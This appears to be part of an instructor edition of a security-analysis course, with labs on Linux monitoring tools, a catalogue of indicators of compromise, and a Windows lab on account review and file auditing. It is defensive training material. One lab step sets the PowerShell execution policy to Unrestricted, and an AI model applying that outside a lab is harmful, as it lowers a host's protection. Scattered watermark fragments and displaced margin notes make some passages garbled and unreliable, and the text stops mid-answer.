You'll be using your Kali Linux VM for this activity.
ut
Activity: Analyzing
Incidents with Linux- Scenario
Based Tools
Although many of the servers and workstations that Develetech runs are Windows-based, even
ib
more are run on the Linux platform. It's your job to monitor these servers for malicious activity.
First, you'll start by analyzing each system's network interface for any suspicious configurations.
tr
Next, you'll look at a live feed of the processes running on your systems to detect any anomalous or
unwanted behavior. Lastly, you'll examine the network communications between your Linux
systems so you may identify malicious traffic.
is
Because you cannot ensure each and every Linux system has Wireshark installed (or should waste
resources installing it), you'll use the leaner tcpdump command-line tool built into most Linux
D
distributions. Using these various Linux-based tools will ensure your main server infrastructure is
being continuously monitored for incidents.
1.
or
Manipulate your Kali Linux VM's network interfaces.
a) On your Kali Linux VM, open a terminal.
e
b) At the terminal, enter ip a
at
c) Verify the names and addresses of the main interfaces. The eth0 interface is the main interface that
the VM communicates with. The docker0 interface is the network interface for Docker containers.
The lo interface is the loopback interface that defines the localhost address (127.0.0.1).
lic
d) Enter sudo ip link set eth0 down

e) Enter ip a and verify that the eth0 interface is marked as DOWN.
f) Enter sudo ip link set eth0 up to reactivate the interface.
up
2. Enter ip link set help

How would you change the maximum transmission unit (MTU) for the eth0
D
interface to 512?
A: sudo ip link set eth0 mtu 512
ot
3. Enter the command you came up with in the previous step. Enter ip a to
verify your changes, and then reset the MTU to 1500.
N
How might you use the ip command to analyze a potential attack?

o
A: Answers may vary. If any of the interfaces on a host are not configured properly when compared
to their baseline, this could indicate a compromise. Settings like the IP address, MTU, and MAC
D
address could be altered by an attacker to intercept communications or turn the host into a botnet
zombie under some remote server's control. Abnormal packet transmission totals or excessive
packet loss errors could indicate likewise.
4. Retrieve a static list of processes on the system.

a) At the prompt, enter ps aux

The a flag selects all processes with a terminal. The u flag shows the user or owner of the process.
The x flag adds onto the a flag by also showing processes that do not have a terminal.
b) Verify that you can see a static list of processes, including information about each process's user,
CPU usage, memory usage, start date and time, command, and more.
e
ut
ib
tr
The screenshots of the
5. Retrieve a real-time list of running processes on the system. ps and top commands
is
may not exactly match
a) At the prompt, enter top
what students see.
b) Verify that you can see a continually updating table of processes.
D
or
e
at
lic
up
D
Unlike ps, top provides process information in real time.

c) Open the Firefox ESR browser and navigate to google.com.
ot
N
o
D

d) Verify that Firefox ESR now shows up as a process from the top command, and that you can see
its CPU and memory usage.
e
ut
ib
tr
e) Start other applications like the file manager (Thunar), Mousepad, Metasploit, and more. Examine
how each one affects CPU and memory usage.
is
Note: The Metasploit process is listed as ruby, as this is the programming
language that Metasploit and its scripts are written in.
D
f) Press q or Ctrl+C to terminate the top program.
6.
or
How might you use the top command to detect malicious activity?
A: Answers may vary, but one of the most common ways to detect malicious activity is by watching
the memory and CPU usage of processes running on the system. You may be able to spot
e
suspicious processes that are taking up too many resources.
at
7. Start a live packet capture.

a) At the terminal, enter tcpdump -D and verify the available interfaces to capture on.
lic
You'll be capturing on the eth0 interface, but you could also capture on all interfaces by not
specifying one.
b) Enter sudo tcpdump -i eth0
up
c) Open another terminal.

d) Ping three or four different public domains.
Examples: google.com, cisco.com, amazon.com, and wikipedia.org.
e) Verify that tcpdump is capturing the traffic from the sites you pinged.
D
f) Press Ctrl+C to end the capture.
Start another live capture, this time saving the data to a file.
ot
8.
a) At the terminal, enter sudo tcpdump -w /home/kali/Desktop/capture1.pcap -i eth0
The -w flag saves the capture information as a .pcap file for later examination using tcpdump or
N
Wireshark.
b) Generate more traffic by pinging the domains again.
If traceroute isn't c) Enter traceroute google.com and verify that you can see the various hops along the route to
o
producing results, have Google's web servers.

students add the -I flag
D
at the end of the

command to use ICMP
echo requests.

d) Return to the tcpdump command prompt and press Ctrl+C to end the capture.
If the packet capture file
e
9. Compare using tcpdump and Wireshark to analyze a packet capture. doesn't visually appear
on the desktop, have
ut
a) Double-click the capture1.pcap file on the desktop to open it in Wireshark.
students open Wireshark
b) Verify that you can see your capture in Wireshark. and then open the
packet capture file from
ib
there.
tr
is
D
or
e
c) Return to a terminal and enter tcpdump -r /home/kali/Desktop/capture1.pcap
at
The -r flag tells tcpdump to open a capture from a file and display it in the terminal.
10.Note the difference between how tcpdump and Wireshark display packet
lic
contents.
What other Linux tools and commands could you use to search the capture if
up
you didn't have access to Wireshark?

A: Answers may vary, but using grep to search the capture for specific addresses, protocols, or
other details, and cut to trim the output, would be useful.
D
11.Close all open windows in Kali Linux.

ot
N
o
D

TOPIC C
Analyze Indicators of Compromise
Now that you know the tools and techniques of active analysis, you can begin to apply them to
situations that may show signs of an attack. In this topic, you'll take a closer look at these situations
so you can make more informed decisions about how to respond.
e
ut
Indicators of Compromise (IOCs)
Indicators of Indicators of compromise (IOCs) are any residual sign that an asset or network has been
ib
Compromise (IOCs) successfully attacked or is continuing to be attacked. IOCs can be definite and objectively
identifiable, like malware signatures, but many IOCs require subjective judgment calls based on the
analyst's experience and knowledge of organizational systems. Because these IOCs are often
tr
identified through anomalies rather than overt incidents, they can be open to interpretation.
Therefore, it's important, whenever possible, to correlate multiple situations together to produce a
is
more complete and accurate narrative of events, and to help you avoid false positives and other
common analysis pitfalls. Still, you may find that all you have to go on are individual, isolated IOCs
D
—these are the ones that require the most focused and careful analysis.
As there are many different targets and vectors of an attack, so too are there many different
potential IOCs. The following is a list of some of the most common or major IOCs that you may
encounter:
• Unauthorized software and files.
• Suspicious emails.
or
e
• Suspicious Registry entries.
at
• Unknown port and protocol usage.

• Excessive bandwidth usage.
• Service disruption and defacement.
lic
• Rogue hardware.
• Suspicious or unauthorized account usage.
up
IOC Tools
There are tools that can help you identify IOCs. Likewise, the OpenIOC framework provides a
standardized format for defining new IOCs as the threat landscape evolves. For example, FireEye
D
provides IOC Finder for collecting host data and detecting the presence of IOCs; IOC writer for
creating definitions in the OpenIOC format; and IOC Editor for managing IOC data. You can also
share IOC data with other cybersecurity professionals using community-driven threat intelligence
ot
sites like IOC Bucket (https://iocbucket.com/).

N
Threat Hunting
Threat Hunting Threat hunting, also called hunt teaming, is a technique that facilitates detection of anomalous
o
and/or malicious behavior. Instead of passively monitoring entities and systems, a team of security
personnel will actively "hunt" for indicators of compromise in a particular environment. This is
D
based on the assumption that you may already be compromised, even if you don't notice any overt
signs of an incident. A hunt team will typically examine hosts and network activity for evidence of
command and control (C&C) channels used in a botnet; unusual Registry keys that could indicate
persistent malware; rogue hardware that is attached to the network; and more.
Lesson 9: Performing Active Asset and Network Analysis | Topic C

Unauthorized Software and Files

One of the most glaring IOCs is the presence of known malicious software on a system. For the Unauthorized Software
most part, this will be worms, viruses, or Trojans that are currently propagating in the wild and have and Files
successfully made it into your perimeter. Any malicious software, whether detected by a typical scan
or by more active monitoring and analysis, should immediately be treated as an IOC. This is
especially true for malware that has made its way onto mission-critical assets like web servers and
financial databases. The presence of malware doesn't always indicate you have a significant crisis on
your hands, but it should at the very least prompt you to act quickly and decisively in order to find
e
out what it does and how you can contain and eliminate it.
ut
A more subtle software-based IOC involves the presence of attack tools on a system. If an analyst
or an automated monitoring system detects, for instance, High Orbit Ion Cannon (HOIC) or some
other distributed denial of service (DDoS) application on an end user's workstation, it may suggest
ib
an insider threat. However, an external attacker may be using this host as a staging point for more
attacks without the user's knowledge. Either way, the key thing to look out for is the presence of
attack tools in suspicious contexts. It makes sense for a penetration tester to have this tool on their
tr
system, but not an employee from the Accounting department. Keep in mind that the term "attack
tools" is often a matter of the person's intent—the same tools, after all, may be used by security
is
personnel to defend the network.
Unauthorized software doesn't always have to mean overt malware. Clever attackers can make
D
modifications to existing files to facilitate their attack. For example, a hosts file is a perfectly normal
file to see on a client machine. However, an attacker can modify this file to initiate a pharming
attack, and all of a sudden the legitimate file is being used in a malicious way. Occasionally, attackers
or
or malware will leave behind suspicious files during or after an attack. The suspicious file may
indicate advanced persistent threat (APT) activity, or may simply be carelessness and a failure to
properly cover one's tracks; for example, a Trojan may install a rootkit via some innocuous-looking
file, but then forget to clean up Registry entries for the Trojan after the rootkit is installed. Host
e
intrusion detection systems (HIDSs) are specifically designed to monitor changes to important files
at
or the creation of unknown files.

lic
up
D
ot
N
o
D

e
ut
ib
tr
is
D
or
e
at
lic
Figure 9-13: A hosts file has been modified maliciously.
IOCs in Startup
up
Malware often thrives in an environment when it's able to immediately start running even after a
user has restarted the operating system. Otherwise, the malware would likely require some additional
direct action on the user's part to stay active. Therefore, malware usually injects itself into the startup
D
list of an operating system. Depending on the OS, you can analyze the startup menu for any
programs that either appear malicious or that you can't verify. Tools like the Startup tab in
Windows Task Manager will provide only an incomplete list, so consider using a tool like Autoruns
ot
to see everything that automatically runs at boot.
IOCs in Patches
N
While many patches are designed to fix security issues, some introduce new vulnerabilities or break
existing security integration and functionality. Unauthorized patching of operating systems and
o
software to specific versions can indicate an attempt by an attacker to create an opening for their
attack. In doing so, they can create the guise of having engaged in proper security behavior.
D
IOCs in Metadata
The signs of an attack may also be present in file system metadata rather than the content of files
themselves. For example, the last modified date of a file might be something absurd like 01-01-1900
if the attacker was careless in their attempt to cover their tracks. Or, the indication may be more
subtle, like a last modified date on a weekend when no one should have access to the system.
Besides dates, other metadata like the account that created the file, the size of the file, the length and

encoding information of media like videos, what location a photo was taken in, etc., are all potential
IOCs.
IOCs in Archives and Deleted Files

Attackers may attempt to avoid notice by including malicious files in archive file formats like ZIP or
RAR. If the file were loose, it would be easier to detect; but detecting individual files inside a larger
archive is not as easy for both automated systems and human analysts to do. So, the presence of
unrecognizable or suspicious archive files may be an indicator of compromise. Another way
attackers attempt to avoid detection is by deleting files that may be part of an attack. If you regularly
e
scan systems for traces of deleted files, you may find evidence that an attack has taken place.
ut
Suspicious Emails
ib
Spam and phishing emails are very common, especially when their target is personnel who oversee Suspicious Emails
major business operations. Management in your organization will likely be targeted frequently by
tr
attackers looking to steal high-level credentials. Although most email-based social engineering
attempts don't indicate compromise if the target is well trained on how to spot and reject such
attempts, there are certain situations where they actually can be IOCs.
is
For example, an insider threat may be in contact with someone on the outside, providing them with
confidential information. The insider threat either has access or gains access to a customer account
D
database that stores personally identifiable information (PII) and banking information. They then
send some of this information via an email body or attachment to their contact on the outside so the
contact doesn't need to break into the network themselves. If you monitor email transmissions for
or
specific keywords, phrases, or file contents, you may come across an IOC when you start seeing
outbound transmissions that include strings of credit card numbers. Information like this is almost
never communicated over email, and should raise a red flag. You can then verify the employee has
e
access to the customer account database, and whether or not the flagged information is in the
database. This can help you determine if the employee's credentials are compromised, if the database
at
is compromised, or both.
It's not just outbound email that can be an IOC. For example, an employee receives an email from
lic
their manager's account that asks them to share confidential information. The message is
uncharacteristic of the manager, being typed poorly and rife with spelling and grammatical errors.
On the surface, this may seem like a standard phishing attempt, but the fact it appears to be sent by
up
the real account may imply something more. Although email sources can be spoofed, you check the
email server and verify the very same email message was sent from the manager's account to the
recipient employee. Now the threat is more serious, as it appears the manager's account has been
hijacked and is being used for malicious purposes.
D
ot
N
o
D
Figure 9-14: A suspicious email sent from a legitimate source, indicating that Jack Price's account
may have been hijacked.

IOCs for Spoofed Messages

IOCs for Spoofed As you've seen before, spoofing email messages is relatively easy, and, in many cases, very
Messages convincing. However, spoofed messages are not perfect—they can still leave behind suspicious
values in the email's headers. Headers aren't commonly exposed to the user by most email
applications, which is why they're usually not a factor in an average user's judgment. However,
applications like Microsoft® Outlook® have advanced options that enable you to view headers, and
in some cases, you can save the email message in a common format and open it in a text editor to
view the headers. You can also implement software that inspects headers and triggers an alert if the
e
headers match known malicious values.
ut
Potential IOCs in an email header include:
• The IP address listed in the Received: from field.
• The Simple Mail Transfer Protocol (SMTP) HELO value, which identifies the sending machine.
ib
• The Received: by field, which lists the chain of computers that sent and received the email until
it reached its destination.
tr
If any of these fields list an IP address or name you recognize as malicious, or fail to recognize as
legitimate, you might have a spoofed message on your hands. The following screenshot highlights
is
suspicious values that indicate a spoofing tool was used to send the email in the previous figure.
D
or
e
at
lic
up
D
Figure 9-15: Suspicious values indicate a spoofing tool was used to send the email.
Note: Keep in mind that even email headers can be spoofed, so you may be subject to false
ot
negatives.
N
Suspicious Registry Entries

Suspicious Registry There are several ways an attacker could use the Windows Registry as a compromise vector, but
o
Entries certain Registry entries are more common targets than others. The autorun entries in the Registry
are often targeted because they're not always visible to the average user. In modern Windows
D
systems, there are two types of autorun keys: Run, which initializes its values every time a user logs
in, and RunOnce, which initializes its values on the next user log in, whereupon the key is removed
from the Registry so it does not run again. Examine both to reveal any unknown or suspicious
values that shouldn't be there. More specifically, these keys are located in:
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Note: Older versions of Windows may also have RunServices and RunServicesOnce entries.
e
ut
ib
tr
is
Figure 9-16: A suspicious key in the Registry's Run entry.
D
Another common tactic for malware is to change file associations in the Registry, especially the
association of executable and shell-type files like EXEs, BATs, COMs, CMDs, and more. A user
or
double-clicks a file with any of these extensions, expecting it to open in a certain program, but
instead it's opened by rogue software that further compromises the computer. File extension
Registry entries are located in HKEY_CLASSES_ROOT (HKCR), which merges the file
extension entries in HKLM and HKCU\SOFTWARE\Classes.
e
Malware can also modify Registry entries that work with the system's running drivers and services.
at
An unrecognizable entry, or an entry with suspicious key data, may indicate the malicious software is
running stealthily in the background to avoid detection. These Registry entries are found in HKLM
\SYSTEM\CurrentControlSet\Services.
lic
Note: It's best to edit the Registry while Windows is loaded in Safe Mode to prevent unwanted
applications from starting automatically.
up
Unknown Port and Protocol Usage

D
When it comes to TCP/UDP ports, some malware has been known to use certain ports, but Unknown Port and
unfortunately there's no definitive or comprehensive list. Malware writers easily adapt and change Protocol Usage
how their software communicates, which is why many administrators implement a whitelist at the Ensure students
ot
firewall. Still, certain ranges of ports are more likely to indicate a compromise. The dynamic and understand the different
private range (49152–65535) can't be registered with the Internet Assigned Numbers Authority ports used in each side
(IANA) and is typically used by protocols for temporary communication sessions. If an unknown of a connection. The
N
open port in this range appears constant on a host, it may indicate a channel that's carrying server port is usually in
the well-known range
malicious traffic.
(0–1023), but the client
o
Still, even the range of registered ports (1024–49151) is used for malicious communications. port is usually in the
Although an unknown protocol could clash with the protocol that's actually registered, chances are ephemeral range (1024–
D
the host isn't necessarily using the registered protocol. So, malware could initiate a connection over a 65535).
registered port without any conflict. For example, Internet Relay Chat (IRC) is registered on port
6660, but the W32.Spybot.OBZ worm has been known to launch DDoS attacks on this port.

e
ut
ib
Figure 9-17: Using netstat to enumerate network sockets. Notice that the host is listening on
several ports within the dynamic and private range.
tr
Although open ports in the well-known range (0–1023) can still carry malware, their being open
won't necessarily be an IOC. Your organization will need to keep ports 80 and 443 open, for
is
example, despite the threat of worms and other malicious software. So it then falls to you to analyze
how the main protocols are used. Assume that you have a File Transfer Protocol (FTP) server set up
D
with transport encryption (FTPS) for remote employees to both upload and download files.
Naturally, ports 989 and 990 will be open on the FTP server itself. But you also notice that some of
the back-end servers in your organization are communicating over FTPS, despite the fact they have
or
no reason to. This unexpected outbound communication could indicate the legitimate FTPS
protocol is being used maliciously to move sensitive data to the FTPS server where it can be
exfiltrated by a remote client.
e
Note: You can look up suspicious ports on https://www.speedguide.net/ports.php to see if
that port is known to be used for malicious purposes.
at
Excessive Bandwidth Usage

lic
Excessive Bandwidth At some point, you or your team should create a baseline for network performance. Although the
Usage bandwidth usage of your network may fluctuate from day to day, it will usually hover around the
up
same range. If that range is exceeded in a small period of time (e.g., a few seconds), or even if you
notice an increasing trend over a larger period of time (e.g., a few weeks), it could indicate that a
malicious user or service is using your network in unauthorized ways.
D
When it comes to malware, worms consume bandwidth more than just about any other type. Their
purpose is to spread through network channels fairly quickly, and even if their payload is small, their
rapid propagation could congest the entire network. The other type of malware that impacts
ot
bandwidth substantially is a bot infection. If attackers have compromised hosts in your network by
turning them into zombies for a larger botnet, they could be sending massive amounts of traffic to
external hosts as part of a DDoS attack. In either case, users may experience lag or other latency
N
issues when they attempt to access a network share or a resource on the Internet. Likewise, your
automated network monitoring tools should detect unusual traffic spikes and generate an alert when
that traffic usage crosses a certain threshold.
o
Bandwidth-related IOCs don't always point to malware, however. If your network is experiencing
D
bandwidth issues, it may be the target of an ongoing DDoS attack from either internal or external
hosts. These attacks are noticeable because they often target public-facing resources like web servers
to deny service not just to the organization, but to its customers as well. So it becomes easier to
determine whether a bandwidth-related IOC is an actual compromise when you consider both the
source and the destination of the excessive traffic.

e
ut
ib
tr
is
Figure 9-18: Using iPerf to measure network bandwidth usage.
D
Service Disruption and Defacement
or
Excessive bandwidth usage will accompany most service disruption, but this isn't always the case.
Attackers can take down servers by gaining control over them, not just by flooding them with
network traffic. For example, an attacker who is able to move laterally to a domain controller (DC)
Service Disruption and
Defacement
e
by exploiting a golden ticket may be able to shut down the Active Directory service, which could
cause authentication to fail for users accessing other services in the network. The attacker could also
at
move to individual servers and cut them off from the wider network. If your administrators usually
tunnel into an application server using Secure Shell (SSH), and now find that their connections are
being interrupted or denied, it could indicate that an attacker was able to stop the SSH service on
lic
the application server. Keep in mind that service disruption is difficult to diagnose, and is often
mistakenly thought to be an IOC when it may in fact be a maintenance issue.
One of the most overt and definite signs of a compromise is when a service like a website is
up
defaced. Attackers may exploit Structured Query Language (SQL) injection weaknesses or gain
control of the web server itself to alter the site's presentation. Most defacements aren't very subtle,
as the attacker usually wants their work to be recognized. So, the site will often stand out to even
D
those that have never visited it—this may include simplistic text and a background with eye-catching
colors; text that taunts the organization or its users; graffiti on legitimate images; irrelevant or
foreign images that identify the attacker's affiliation or political beliefs; and scripts or links that inject
ot
malware onto a visitor's computer. Some defacement attacks are more subtle, however, and may
simply sneak in an ironic modification of text or an image that isn't easily noticeable. These types of
defacement attacks are meant to confuse users into believing that the organization is responsible for
N
the offending material, and not some malicious hacker.

o
D

e
ut
ib
tr
is
D
or
Figure 9-19: In one of the most well-known incidents, a group of attackers defaced the
promotion site for the 1995 film "Hackers."
e
at
Note: Other than disruption and defacement being IOCs themselves, some IOCs like a change
to a server configuration at an unusual time can indicate a disruption and/or defacement attack.
lic
Rogue Hardware
up
Rogue Hardware Rogue hardware is any unauthorized piece of electronic equipment attached to a network or assets
in an organization. A Universal Serial Bus (USB) thumb drive may be attached to a web server to
siphon sensitive data. An extra network interface controller (NIC) may be installed on an employee's
workstation to create a side channel for an attack. An employee's personal smartphone may be
D
connected to the network, exposing the network to malware. A new MAC address might appear on
the network used as an attack platform. These situations could indicate a compromise, but much of
that determination will depend on your existing security policies and the context of the situation.
ot
Ultimately, truly rogue hardware is designed to exploit organizations' tendencies to secure their
logical infrastructure while neglecting their physical one.
N
One of the most common types of rogue hardware is a rogue wireless access point (WAP). Anyone
with access to your network can create a WAP, even from a non-specialized device like a laptop.
They can intentionally mislead others into connecting to their rogue access point (called an evil
o
twin), which then opens the door for a man-in-the-middle attack on unsuspecting users. The signs
of a rogue WAP may include unknown or unidentifiable service set identifiers (SSIDs) showing up
D
within range of the office; lost or malformed traffic within the network; and devices appearing in the
building that are unaccounted for.
Rogue hardware is a major reason why you should have an inventory of all devices in your
organization.

Suspicious or Unauthorized Account Usage

Security teams frequently monitor authentication and authorization systems because of how much Suspicious or
valuable information they can provide about the state of access control in the organization. Unauthorized Account
Attackers prize access above all because it opens many doors across the network, enabling them to Usage
extend the reach and effect of their attack. In doing so, however, they tend to leave traces behind
that will help you detect their malicious behavior. The following list outlines some of the most
common IOCs associated with account usage:
• Unauthorized sessions: As you monitor access, you may see certain accounts access devices or
e
services they should not be authorized to access. For example, a user with limited privileges may
ut
be signed in to a domain controller. Only administrators should have access to the DC, so this
could indicate unauthorized privilege escalation and compromise of the server.
• Failed logins: When you check access logs, you'll eventually get used to the sight of failed
ib
logins. After all, users forget or mistype their passwords all the time. However, repeated failures
for one account may suggest more than just benign attempts, especially for administrator
accounts. Attackers who try brute-force password cracking will go through hundreds, maybe
tr
thousands of attempts if there are no failure limits set on the system.
• New accounts: Instead of attempting to crack an existing account, an attacker may be able to
is
create new accounts in a system. You should already be monitoring account creation carefully,
especially in a domain environment where only certain administrators should be able to create
D
them. Although a new standard user account may indicate a compromise, it is new administrator
accounts that you need to pay special attention to. An attacker with their own high-level
permissions can cause serious damage.
or
• Guest account usage: In most cases, you should be disabling the guest account on your
systems. However, some systems may slip by, so be sure to monitor your login events for
instances of the guest account. While guest accounts don't have many privileges, they can enable
an attacker to log on to a domain they do not otherwise have access to.
e
• Off hours usage: Depending on the normal work period in your organization, seeing an account
at
being used during off hours may indicate an attacker attempting to catch the organization
unaware. For example, if your employees work 9:00 a.m. to 5:00 p.m., and the account for one of
those employees signs in to the virtual private network (VPN) at 3:00 a.m., the account may have
lic
been hijacked. To be sure, you should follow up with the employee.

• "Superhuman" account usage: Certain account behavior may seem anomalous, impossible,
improbable, or just strangely unrealistic. For example, if a user logs in to a system from an IP
up
address range assigned to the United States, and then minutes later that same account logs in
from an IP address range assigned to the United Kingdom, then you have suspicious behavior
on your hands. The practice of validating whether or not certain account behavior is possible
given the speed of current travel technology is known as geo-velocity.
D
Additional IOCs
ot
The following is a list of additional behaviors that could be indicators of compromise: Additional IOCs
• Scan sweeps across the network: An attacker may be attempting to perform reconnaissance
N
on the network and its hosts. An IDS or a similar system will detect these scans and alert you to
suspicious behavior, assuming the system is calibrated correctly.
o
• Unusual network traffic that could indicate internal hosts are communicating with a
command and control (C&C) operation: A bot may beacon its C&C server by sending simple
D
transmissions at regular intervals to unrecognized or malicious domains. Likewise, irregular peer-

to-peer (P2P) traffic in the network could indicate malicious network communications with a
centralized C&C server.
• Unauthorized changes to a host's hardware or software: An attacker may attempt to change
how a device or application behaves to exploit some sort of vulnerability or to open a new vector
through which the attacker can initiate an attack. For example, the attacker may open ports or
start services on a workstation that enables them to take remote control of the host.

• Unexpected output from applications: Assuming you have a baseline for known behavior in
your applications, you may start to see their behavior deviate from the norm. This could be a
symptom of unauthorized changes made to the application by an attacker, or it could suggest the
presence of malware on the host system.
• Memory overflows and other application-crashing errors: One denial of service (DoS) attack
method is to cause an application to overrun its memory buffer to trigger an execution failure.
While software does occasionally crash, repeated failures not attributable to other factors could
indicate a compromise. Testing software in a controlled environment will help you determine if
this truly is an IOC or just a false positive.
e
ut
Guidelines for Analyzing Indicators of Compromise
Guidelines for Analyzing
ib
Indicators of Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
Compromise CHOICE Course screen.
tr
Use these guidelines when analyzing potential IOCs.
Analyze Indicators of Compromise
is
When analyzing IOCs:
D
• Look out for known malicious software on a system.
• Look for known attack tools/security tools on a system that doesn't need them.
• Watch for modification of legitimate files to facilitate an attack.
or
• Monitor for keywords or suspicious information in email.
• Monitor for phishing attempts that indicate an actual account compromise.
• Review the startup, file association, and driver/service Registry entries for unknown keys and
e
values.
• Monitor typically unused ports for suspicious usage.
at
• Monitor how common ports are used to detect traffic that is using these ports for malicious
purposes.
lic
• Set a baseline for network bandwidth and routinely compare your current bandwidth to this
baseline.
• Monitor key systems like web servers that are common targets for disruption and defacement.
up
• Bolster physical security to prevent rogue hardware from attaching to the network.
• Monitor account usage carefully for suspicious or unauthorized behavior, like excessive failed
logins or new unknown accounts.
D
• Monitor the network for reconnaissance scans and botnet communications.

• Monitor hosts and applications for unexpected changes, outputs, and crashes.
ot
N
o
D

ACTIVITY 9-3
Analyzing Indicators of Compromise
Data File
e
C:\CNX0013Data\Performing Active Asset and Network Analysis\Get-UnusedAccounts.ps1
ut
Activity: Analyzing
Before You Begin Indicators of
Compromise
In this activity, you'll be using your Windows Server and your Kali Linux VM. A suspicious user
ib
account, testaccount, has already been added to the Active Directory domain. In a prior activity,
"Assessing Data Exfiltration," you created a C:\CurrentProjects\DT_Watch folder on your
tr
server.
Scenario
is
Your system administrators at Develetech have been seeing strange behavior on the domain
controller and have asked for your help in assessing this behavior. In particular, they've noticed
D
account activity from accounts they don't recognize. Additionally, the admins have a hunch that key
files may have gone missing, but they can't verify this information and have no way of knowing for
sure. These events may indicate an attacker has compromised the domain controller, but you need
to be certain before you make a call.
or
So, you'll examine the domain for suspicious user accounts, as well as implement auditing on key
files and folders to help track any access or modification to these sensitive objects. By evaluating
e
potential IOCs like these, you can more easily identify attacks on your networks and systems.
at
1. Open the Get-UnusedAccounts.ps1 Windows PowerShell script.

lic
a) From your Windows Server, select the Start button, and then select Windows PowerShell ISE.
b) Select File→Open.
c) Open Get-UnusedAccounts.ps1 from the course data files.
up
D
ot
N
o
D

d) Verify that the contents of the script open in the editor.
e
ut
As the comment indicates, this script will retrieve all Active Directory (AD) accounts in the domain
that have never been logged in and are in an enabled state:
• Get-ADUser is the main cmdlet that retrieves the account information based on the provided
ib
factors.
• The -F parameter tells the cmdlet to filter its results based on everything contained within the
curly braces.
tr
• The filter has two conditions: the first looks for any accounts whose last logon time is not like any
valid value (using a wildcard), and the second looks for accounts that are enabled. The -and
is
parameter indicates this is a logical AND operation—i.e., both conditions must be true.
• The -Properties * parameter indicates that the cmdlet is looking through all account
D
properties.
• The Get-ADUser cmdlet is then piped to the Select-Object cmdlet on the next line.
• The Select-Object cmdlet ensures that only three properties of any accounts matching the
e)
or
filter are returned: the logon count of the user, the name of the account, and the groups the
account is a member of.
In the Windows PowerShell prompt at the bottom of the window, enter Set-ExecutionPolicy
Unrestricted
e
f) In the Execution Policy Change dialog box, select Yes.
g) From the menu, select File→Run.
at
h) Examine the results and verify that testaccount is listed.

lic
2. What can you conclude about the account listed in the results?
A: It hasn't been used yet, and appears to have been created as a backup or backdoor method for
access to the domain. The DC administrators may be helpful in verifying this account's purpose.
up
3. Assuming this account was created or used by an attacker, what could the
attacker have done to make it harder to spot as malicious?
D
A: The attacker could have given it a name more relevant to the company, especially if the company
has specific account naming conventions. Limiting the account's privileges may also make it less
likely to be monitored or audited.
ot
4. Close Windows PowerShell ISE.

N
5. Enable auditing of the DT_Watch folder.

a) Navigate to C:\CurrentProjects.
o
b) Right-click the DT_Watch folder and select Properties.

c) Select the Security tab.
D
d) Select the Advanced button.

e) Select the Auditing tab.
f) Select the Add button to open the Auditing Entry for DT_Watch dialog box.
g) Select the Select a principal link.
This enables you to define which accounts you want to audit against.
h) In the Enter the object name to select (examples) text box, type Everyone and select the Check
Names button.

i) Verify that Everyone is underlined, indicating that Windows recognizes the group.
e
ut
ib
tr
is
D
j) Select OK.
k) In the Basic permissions section, check the Full control check box.
or
e
at
lic
up
D
ot
Note: You are not granting these permissions to use the folder; you are
enabling the usage of these permissions to be recorded.
N
l) Select OK three times to close each successive dialog box.
6. Enable logging for audited objects.

o
a) From Server Manager, select Tools→Local Security Policy.

D
b) In the console tree, select Local Policies→Audit Policy.

c) In the details pane, double-click Audit object access.

d) Check both the Success and Failure check boxes and select OK.
e
ut
ib
tr
is
D
or
e
at
lic
up
e) Close the Local Security Policy window.

Be prepared to help
students remember the 7. Remotely access the DT_Watch folder to generate audit logs.
following commands
D
a) Switch to your Kali Linux VM and open an SSH connection to the Windows Server using the
they've used before.
Administrator account.
b) In the shell, navigate to the C:\CurrentProjects\DT_Watch directory.
ot
c) Execute a directory listing.

d) Enter type budget.xls
This command displays the raw data of the workbook file.
N
e) Enter echo Hello there! > hello.txt to create a new text file in the directory.
o
D

f) List the directory's contents and verify that hello.txt is there.
e
ut
ib
tr
is
D
g) Enter del hello.txt to delete the file.
h) Exit the SSH session. or
Open Event Viewer and examine the audited events.
e
8.
a) Switch back to your Windows Server 2019 machine.
at
b) From Server Manager, select Tools→Event Viewer.

c) Expand Windows Logs→Security.
lic
d) In the Actions pane on the right, select Filter Current Log.

up
D
ot
N
o
D

e) In the Filter Current Log dialog box, in the <All Event IDs> text box, type 4659
e
ut
ib
tr
is
D
or
e
at
lic
up
Note: Event ID 4659 is described as "a handle to an object was requested

D
with intent to delete."

f) Select OK to apply the filter.
ot
g) Verify that Event Viewer selects the lone entry.

N
o
D

h) Review the General tab below the entry and confirm that your deletion of hello.txt was logged.
e
ut
ib
tr
i) From the Actions pane, select Clear Filter.
is
j) Review the detailed information about some of the other events that have a Task Category of File
System.
D
Note: Remember that you can sort, filter, and search the event log.
9. What remote changes did Windows detect to the DT_Watch directory? or

A: Windows logged everything associated with accessing the directory, even the directory listing
they can use Find to
search the event log for
ReadData (or
e
commands. ListDirectory). This
at
indicates an attempt to
10.Why is this level of auditing impractical for commonly used folders? list the contents of the
DT_Watch folder.
A: Answers may vary, but the volume of logs would be incredibly difficult, if not impossible, to
lic
manage.
11.What type of security solution would be better at detecting unauthorized

up
changes in files and configurations?

A: Answers may vary, but a host-based intrusion detection system/host-based intrusion prevention
system (HIDS/HIPS) or file integrity monitors (FIMs) are suited to this kind of security control.
D
12.Consider all of the attacks you've simulated in class so far.

What other IOCs might you have left behind?
ot
A: Answers will vary, but could include: excessive login failures, unexplainable gaps in logs, unusual
levels of ICMP traffic or other networking protocols, unusually high access rates to the
N
Administrator account, and so on.
13.Close Event Viewer.

o
D

Summary
In this lesson, you actively analyzed your network, systems, and other assets in order to catch
malicious behavior quickly and effectively. You used Windows and Linux as platforms to detect
these attacks. You then assessed how various situations and scenarios could indicate a compromise,
even if the signs aren't overt.
Which operating system platform(s) do you see yourself using most to analyze
e
use the social
networking tools attack behavior?
ut
provided on the CHOICE A: Answers will vary. Students who work in organizations that employ Windows domains may stick with
Course screen to follow Windows-based tools and techniques, as these are the types of systems they need to protect. Still,
plenty of Linux tools can analyze attacks on Windows computers, not to mention being fundamental
ib
to securing the Linux servers they may have. In all, it's likely students will be working at least
and resources to support somewhat with both platforms, even if they work more heavily with one. Students' answers may also
depend on their comfort level with each platform's command-line syntax.
tr
continued learning.
What are some of the most common IOCs you've seen in your organization or
is
an organization you're familiar with?
A: Answers will vary. The presence of malware is often a major IOC in any organization. Some students
D
